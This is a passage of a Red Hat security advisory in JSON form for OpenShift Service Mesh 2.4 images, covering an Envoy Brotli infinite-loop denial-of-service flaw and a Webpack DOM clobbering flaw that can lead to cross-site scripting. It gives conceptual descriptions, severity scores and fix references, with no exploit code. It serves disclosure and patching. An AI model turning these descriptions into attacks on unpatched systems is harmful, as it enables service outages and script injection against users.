"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-32976"
},
{
"category": "external",
"summary": "RHBZ#2283145",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283145"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-32976",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-32976"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-32976",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32976"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m"
}
],
"release_date": "2024-06-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "envoy: Brotli decompressor infinite loop"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
